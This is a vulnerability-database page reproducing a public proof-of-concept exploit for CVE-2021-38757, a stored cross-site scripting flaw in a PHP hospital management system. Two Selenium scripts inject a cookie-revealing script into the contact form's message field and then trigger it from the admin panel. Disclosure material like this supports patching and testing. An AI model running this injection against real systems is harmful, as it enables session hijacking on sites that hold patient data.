Lucene search
K

Hospital Management System Cross Site Scripting

🗓️ 18 Aug 2021 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 238 Views

Hospital Management System XSS vulnerability on "txtMsg" parameter allows user session hijackin

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-38757
16 Aug 202100:00
attackerkb
Circl
CVE-2021-38757
16 Aug 202118:14
circl
CNNVD
Hospital Management System 跨站脚本漏洞
16 Aug 202100:00
cnnvd
CNVD
PHPGurukul Hospital Management System Cross-Site Scripting Vulnerability (CNVD-2021-68754)
18 Aug 202100:00
cnvd
CVE
CVE-2021-38757
16 Aug 202113:53
cve
Cvelist
CVE-2021-38757
16 Aug 202113:53
cvelist
EUVD
EUVD-2021-25194
7 Oct 202500:30
euvd
NVD
CVE-2021-38757
16 Aug 202114:15
nvd
Prion
Cross site scripting
16 Aug 202114:15
prion
RedhatCVE
CVE-2021-38757
22 May 202520:10
redhatcve
Rows per page
`# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 08.17.2021  
# Vendor: https://github.com/kishan0725/Hospital-Management-System  
# Link: https://github.com/kishan0725/Hospital-Management-System  
# CVE: CVE-2021-38757  
  
[+] Exploit Source:  
  
### P0C  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38757  
  
from selenium import webdriver  
import time  
import os  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.3/Hospital-Management-System-master/contact.html"  
  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
## The Exploit  
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")  
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"  
[email protected]\"")  
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")  
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")  
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")  
  
## submit the exploit  
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")  
  
# Check  
os.system("python PoC-CVE-2021-38757-Check.py")  
  
print("The payload for CVE CVE-2021-38757 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
### Ch3ck  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38757  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.3/Hospital-Management-System-master/index1.php"  
  
#enter your login username  
username="[email protected]"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="email"  
#enter the element for password input field  
element_for_password="password2"  
#enter the element for submit button  
element_for_submit="patsub"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Check  
time.sleep(3)  
browser.maximize_window()  
browser.get(("  
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))  
  
print("The payload for CVE CVE-2021-38757 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757  
# Proof: https://streamable.com/6xue3b  
# BR nu11secur1ty  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2021 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.0018
238